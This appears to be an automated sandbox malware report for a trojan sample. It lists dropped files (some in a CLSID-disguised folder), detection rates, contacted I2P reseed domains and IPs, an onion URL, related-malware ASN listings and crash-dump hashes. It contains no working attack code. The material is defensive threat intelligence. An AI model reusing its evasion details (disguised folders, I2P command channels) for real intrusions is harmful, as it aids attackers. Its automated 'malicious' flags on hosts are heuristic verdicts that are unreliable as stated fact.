C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\libi2p.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.exe	75%	ReversingLabs	Win64.Trojan.Barys
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\prgmgr.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rdpctl.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\rfxvmt.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\samctl.dll	0%	ReversingLabs
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\termsrv32.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\73tsjpnle0jv48sgryqfs6ph8t.exe	42%	ReversingLabs	Win64.Trojan.Barys
C:\Users\user\AppData\Local\Temp\cwjk513wjc7a1mlgh3.exe	3%	ReversingLabs
C:\Windows\Temp\6rRRlGVV	0%	ReversingLabs
C:\Windows\Temp\Cw0MZxef	0%	ReversingLabs
C:\Windows\Temp\ROF9A37w	0%	ReversingLabs
C:\Windows\Temp\TsG1eHIt	0%	ReversingLabs
C:\Windows\Temp\bMZx4vGr	0%	ReversingLabs
C:\Windows\Temp\eKTTDy2k	0%	ReversingLabs
C:\Windows\Temp\ogg99SMu	0%	ReversingLabs
C:\Windows\Temp\t291wOio	0%	ReversingLabs
C:\Windows\Temp\w3LkirgH	0%	ReversingLabs

Source	Detection	Scanner	Label	Link
http://upx.sf.net	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
banana.incognet.io	23.137.250.108	true	true		unknown
reseed.diva.exchange	80.74.145.70	true	true		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://reseed.diva.exchange/b.c	main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://i2pseed.creativecowpat.net:8443/	main.exe, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954930725.00000142D8D50000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	true		unknown
https://i2p.novg.net/K	main.exe, 00000017.00000002.2668148330.00000157C5E68000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://kopanyoc2lnsx5qwpslkik4uccej6zqna7qq2igbofhmb2qxwflwfqad.onion/i2pseeds.su3	main.exe, 00000020.00000003.2796330606.00000142D8DAB000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2796297665.00000142D8DD6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2796330606.00000142D8DA2000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://reseed.memcpy.io/	main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	true		unknown
https://reseed.i2pgit.org/	main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	true		unknown
https://reseed-fr.i2pd.xyz/I	main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://reseed-pl.i2pd.xyz/	main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	true		unknown
http://stats.i2p/cgi-bin/newhosts.txt	73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	false		unknown
http://127.0.0.1:8118	73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000003.2278107155.00000157C5E73000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2278195165.00000157C5E78000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	false		unknown
https://banana.incognet.io:443/i2pseeds.su3W	main.exe, 00000017.00000003.2291390149.00000157C6272000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://reseed.onion.im/	main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	true		unknown
https://banana.incognet.io/W	main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://i2p.mooo.com/netDb/	73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	false		unknown
https://reseed2.i2p.net/	main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	true		unknown
http://reg.i2p/hosts.txty-	main.exe, 00000020.00000002.2954930725.00000142D8DA8000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://banana.incognet.io/	main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	true		unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt	main.exe, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr, 6rRRlGVV.23.dr	false		unknown
https://www2.mk16.de/m	main.exe, 00000017.00000002.2668148330.00000157C5E68000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://reseed-fr.i2pd.xyz/	main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	true		unknown
https://reseed.i2pgit.org/L	main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://reseed.onion.im/O	main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmp	true		unknown
https://reseed.i2p-projekt.de/	73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	false		unknown
https://i2p.novg.net/	main.exe, 00000020.00000002.2954829051.00000142D899E000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	true		unknown
https://reseed-pl.i2pd.xyz/3	main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txti2p.su3/)	main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://netdb.i2p2.no/	73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	false		unknown
https://i2p.ghativega.in/	main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	true		unknown
https://reseed.i2pgit.org/6	main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://upx.sf.net	Amcache.hve.31.dr	false	URL Reputation: safe	unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txt/	main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://www2.mk16.de/	73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2668148330.00000157C5E68000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2669826636.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D899E000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	true		unknown
http://reg.i2p/hosts.txt	main.exe, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954930725.00000142D8DA8000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr, 6rRRlGVV.23.dr	false		unknown
https://reseed.stormycloud.org/HWUm~GTa	main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://banana.incognet.io/i2pseeds.su3	main.exe, 00000017.00000002.2668284810.00000157C6271000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2292775303.00000157C6272000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000003.2291390149.00000157C6272000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://reseed-pl.i2pd.xyz/F	main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://reseed.memcpy.io/%	main.exe, 00000017.00000002.2668148330.00000157C5EC7000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://reseed.onion.im/w	main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp	true		unknown
http://identiguy.i2p/hosts.txt	73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	false		unknown
http://reg.i2p/hosts.txtf?	main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://reg.i2p/hosts.txtei	main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://reseed.diva.exchange/	main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	true		unknown
https://reseed2.i2p.net/vp/p_lib.c	main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://legit-website.com/i2pseeds.su3	73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	false		unknown
http://reg.i2p/hosts.txt?~	main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://i2pd.readthedocs.io/en/latest/user-guide/configuration/	73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	false		unknown
https://banana.incognet.io:443/i2pseeds.su3	main.exe, 00000017.00000003.2291390149.00000157C6272000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000003.2782368111.00000142D89FE000.00000004.00000020.00020000.00000000.sdmp	false		unknown
https://reseed.stormycloud.org/	main.exe, main.exe, 00000020.00000003.2782395094.00000142D89D6000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2955509001.00007FFDFB7E4000.00000002.00000001.01000000.0000000C.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D899E000.00000004.00000020.00020000.00000000.sdmp, 6rRRlGVV.23.dr	true		unknown
http://shx5vqsw7usdaunyzr2qmes2fq37oumybpudrd4jjj4e4vk4uusa.b32.i2p/hosts.txttp://	main.exe, 00000017.00000002.2668148330.00000157C5E3D000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000020.00000002.2954829051.00000142D893D000.00000004.00000020.00020000.00000000.sdmp	false		unknown
http://rus.i2p/hosts.txt	73tsjpnle0jv48sgryqfs6ph8t.exe, 0000000C.00000002.2335094214.00007FF71096E000.00000004.00000001.01000000.00000007.sdmp, main.exe, 00000017.00000002.2667528245.00000157C5A0F000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr, 2L2zlVsY.23.dr	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
80.74.145.70	reseed.diva.exchange	Switzerland	21069	ASN-METANETRoutingpeeringissuesnocmetanetchCH	true
2.178.241.192	unknown	Iran (ISLAMIC Republic Of)	12880	DCI-ASIR	false
45.126.126.80	unknown	Australia	64022	KAMATERAINC-AS-APKamateraIncHK	false
146.70.24.213	unknown	United Kingdom	2018	TENET-1ZA	false
85.236.190.252	unknown	Russian Federation	35032	TAHIONISP-ASRU	false
23.137.249.66	unknown	Reserved	397614	GTLAKESUS	false
95.68.156.35	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
89.87.222.219	unknown	France	5410	BOUYGTEL-ISPFR	false
23.137.250.108	banana.incognet.io	Reserved	397614	GTLAKESUS	true
91.149.236.241	unknown	Poland	41952	MARTON-ASPL	false
2.191.228.230	unknown	Iran (ISLAMIC Republic Of)	12880	DCI-ASIR	false
62.210.85.80	unknown	France	12876	OnlineSASFR	false
124.169.148.215	unknown	Australia	7545	TPG-INTERNET-APTPGTelecomLimitedAU	false
151.242.80.51	unknown	Iran (ISLAMIC Republic Of)	31549	RASANAIR	false
82.38.134.93	unknown	United Kingdom	5089	NTLGB	false
217.255.81.237	unknown	Germany	3320	DTAGInternetserviceprovideroperationsDE	true
173.68.123.78	unknown	United States	701	UUNETUS	true
83.255.145.146	unknown	Sweden	39651	COMHEM-SWEDENSE	false
45.30.192.252	unknown	United States	7018	ATT-INTERNET4US	false
173.47.97.119	unknown	United States	26788	ROGERS-COMMUNICATIONSCA	false
23.128.248.23	unknown	Reserved	397120	CHEMUNGCONYUS	true
77.54.240.255	unknown	Portugal	12353	VODAFONE-PTVodafonePortugalPT	true
87.225.96.167	unknown	Russian Federation	12389	ROSTELECOM-ASRU	false
80.46.94.241	unknown	United Kingdom	9105	TISCALI-UKTalkTalkCommunicationsLimitedGB	false
50.100.197.208	unknown	Canada	603	BACOM2-ASCA	false
99.174.64.226	unknown	United States	7018	ATT-INTERNET4US	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1531723
Start date and time:	2024-10-11 16:52:10 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	33
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	file.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@45/68@2/27
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
Excluded IPs from analysis (whitelisted): 20.42.73.29
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdeus15.eastus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 73tsjpnle0jv48sgryqfs6ph8t.exe, PID 6248 because it is empty
Execution Graph export aborted for target file.exe, PID 7096 because there are no executed function
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtCreateKey calls found.
VT rate limit hit for: file.exe

Simulations

Behavior and APIs

Time	Type	Description
10:53:08	API Interceptor	298x Sleep call for process: file.exe modified
10:53:09	API Interceptor	39x Sleep call for process: powershell.exe modified
10:54:35	API Interceptor	40x Sleep call for process: main.exe modified
10:54:40	API Interceptor	1x Sleep call for process: WerFault.exe modified

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ASN-METANETRoutingpeeringissuesnocmetanetchCH	na.elf	Get hash	malicious	Unknown	Browse	94.126.19.25
	http://radio-en-ligne.fr	Get hash	malicious	Unknown	Browse	94.126.16.223
	http://tradingbotsreviews.com	Get hash	malicious	Unknown	Browse	94.126.16.223
	gUJak0onLk.elf	Get hash	malicious	Unknown	Browse	80.74.142.135
	0SpHek7Jd8.elf	Get hash	malicious	Unknown	Browse	80.74.153.240
	https://get-verified-badge-now-free.netlify.app/	Get hash	malicious	Unknown	Browse	94.126.16.223
	https://swans-muffin-1id4964-7304421.netlify.app/form	Get hash	malicious	Unknown	Browse	94.126.16.223
	https://reg1a-g4ad23-269fe50-lqng5s.netlify.app/dev.html/	Get hash	malicious	Unknown	Browse	94.126.16.223
	https://rainbow-yeot-24cb81.netlify.app/appeal.html/index.html	Get hash	malicious	Unknown	Browse	94.126.16.223
	https://profound-maamoul-a6d671.netlify.app/appeal.html/	Get hash	malicious	Unknown	Browse	94.126.16.223
DCI-ASIR	IpYWCeJMsb.exe	Get hash	malicious	SmokeLoader	Browse	93.118.137.82
	0NSjUT34gS.exe	Get hash	malicious	Phorpiex, Xmrig	Browse	2.177.243.253
	SL71PJLYwl.elf	Get hash	malicious	Unknown	Browse	217.218.139.62
	pur361ECCi.elf	Get hash	malicious	Mirai	Browse	89.219.67.124
	na.elf	Get hash	malicious	Mirai	Browse	2.179.9.9
	wu5C20dPdy.exe	Get hash	malicious	SmokeLoader	Browse	93.118.137.82
	z3hir.x86.elf	Get hash	malicious	Mirai	Browse	5.74.168.46
	bomb.exe	Get hash	malicious	Amadey, Go Injector, LummaC Stealer, Phorpiex, PureLog Stealer, Stealc, Vidar	Browse	2.177.243.253
	file.exe	Get hash	malicious	Phorpiex	Browse	2.190.65.74
	file.exe	Get hash	malicious	Unknown	Browse	2.177.52.177
TENET-1ZA	bIb2gpepKH.elf	Get hash	malicious	Mirai	Browse	143.136.183.112
	na.elf	Get hash	malicious	Unknown	Browse	146.69.137.37
	C0B9Ema9el.exe	Get hash	malicious	Remcos	Browse	146.70.57.58
	TLdhryJV0V.exe	Get hash	malicious	Remcos	Browse	146.70.57.58
	na.elf	Get hash	malicious	Unknown	Browse	146.141.199.26
	XvAqhy3FO6.elf	Get hash	malicious	Mirai, Okiru	Browse	143.136.135.240
	x86.elf	Get hash	malicious	Mirai	Browse	152.106.28.88
	81zBpBAWwc.exe	Get hash	malicious	RHADAMANTHYS	Browse	146.70.224.90
	novo.sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	143.128.55.96
	yakov.sh4.elf	Get hash	malicious	Mirai	Browse	154.115.52.8
KAMATERAINC-AS-APKamateraIncHK	nameds	Get hash	malicious	Xmrig	Browse	103.195.7.168
	https://amreican-express.ckawd.top/jp	Get hash	malicious	Unknown	Browse	45.126.125.170
	SecuriteInfo.com.Exploit.Siggen3.32706.7006.xls	Get hash	malicious	Hidden Macro 4.0, Emotet	Browse	103.195.4.8
	SecuriteInfo.com.Exploit.Siggen3.32706.16507.xls	Get hash	malicious	Hidden Macro 4.0, Emotet	Browse	103.195.4.8
	SecuriteInfo.com.Exploit.Siggen3.32706.9748.xls	Get hash	malicious	Hidden Macro 4.0, Emotet	Browse	103.195.4.8
	Scan 2022.20.05_0910.xls	Get hash	malicious	Hidden Macro 4.0, Emotet	Browse	103.195.4.8
	4921176754627453124.xls	Get hash	malicious	Hidden Macro 4.0	Browse	103.195.4.8
	Univ-pau_form.xls	Get hash	malicious	Hidden Macro 4.0	Browse	103.195.4.8
	10082376542717622006.xls	Get hash	malicious	Hidden Macro 4.0	Browse	103.195.4.8
	6691113204648532361.xls	Get hash	malicious	Hidden Macro 4.0, Emotet	Browse	103.195.4.8

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\dwlmgr.dll	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\cnccli.dll	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_main.exe_59e5c191145a7e657df69e5cbadfff4911e783_61e28721_381d6b4d-05a1-4382-babe-90fa558ea39b\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9805730517966776
Encrypted:	false
SSDEEP:	96:V4wFgDac6OsehMX7q9fwQXIDcQic6EcERcw3W3d+HbHg/opAnQzOqg7ThVMkQBr6:Pa2c6O/d0MALS36jV7EzuiFXZ24lO8l
MD5:	BF30ED6D98526E033653DAA37E8B2BBC
SHA1:	30CB07EAE72BF1B4A12AA4657E0A1D2524F48035
SHA-256:	656CE38AA916CC503773E87FF22DFA565D6A0058323AFA7A9DE92F4E55445CA5
SHA-512:	8E5EA50AC5A800748B20E11713BF1F3D73C78C2E0BE49B95B8707C68D5B1FD6B8F143347964A2CF8AAC2F6A5BA63A33A2C8CAFDD308B9A0DA780D71725286B63
Malicious:	true
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.3.1.3.2.0.7.1.9.4.1.4.7.1.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.3.1.3.2.0.7.2.4.7.2.7.1.7.8.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.8.1.d.6.b.4.d.-.0.5.a.1.-.4.3.8.2.-.b.a.b.e.-.9.0.f.a.5.5.8.e.a.3.9.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.6.b.f.9.7.d.8.-.a.5.8.8.-.4.a.4.a.-.8.6.a.0.-.c.d.b.d.d.a.7.3.5.4.a.0.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.m.a.i.n...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.a.6.0.-.0.0.0.0.-.0.0.1.4.-.d.b.5.6.-.d.b.6.7.e.d.1.b.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.0.3.1.8.d.4.3.1.0.6.5.7.e.8.3.6.8.5.5.7.f.1.8.3.e.1.5.c.4.7.c.d.0.0.0.0.f.f.f.f.!.0.0.0.0.a.5.a.c.f.e.6.3.9.7.d.f.f.c.6.1.d.2.4.3.2.0.6.8.8.5.c.3.8.9.e.a.0.5.4.2.8.7.5.5.!.m.a.i.n...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.1.9.7.0././.0.1././.0.1.:.0.0.:.0.0.:.0.0.!.1.d.

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF885.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Fri Oct 11 14:54:32 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	628936
Entropy (8bit):	1.01212478603393
Encrypted:	false
SSDEEP:	768:dPl4NwUHNZrLa4VqesSC92Kt2GdKlcwkVzW21tvTVin5tKpl2shiWZ7m2dQzKLOn:dPaJOINKQ6pD4n9
MD5:	9113770526C65C25CBF53DAFBEB742C1
SHA1:	58FF5D6B1142CECC626057E8AC2B5C5479E124CD
SHA-256:	FB7489A510CE1A61F1FEDDD07E5B4A01B7E0C3C48AE1076253EF220B8F36B4D4
SHA-512:	0F79904772D75EF75BF7B0B0BDE129BBCA30FE6646DD921FB68ACD9CE5080ADE13FC6D4B8EE45F6E88B0D2B348E44DD4E216104DBCF5878322914C0670FC12CE
Malicious:	false
Preview:	MDMP..a..... .......(<.g............$...........(...8...........` ..........h...........`.......8...........T...........(....j..........\!..........H#..............................................................................eJ.......#......Lw......................T.......`....<.g.............................@..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WERF9CE.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	6706
Entropy (8bit):	3.7215090046866637
Encrypted:	false
SSDEEP:	96:RSIU6o7wVetb1E0d9eYHV40Xh5aM4UB89bSeDgUfnmm:R6l7wVeJ1EVYHZprB89bSeFfnmm
MD5:	82345A462558A62672C2C75D6B4A047E
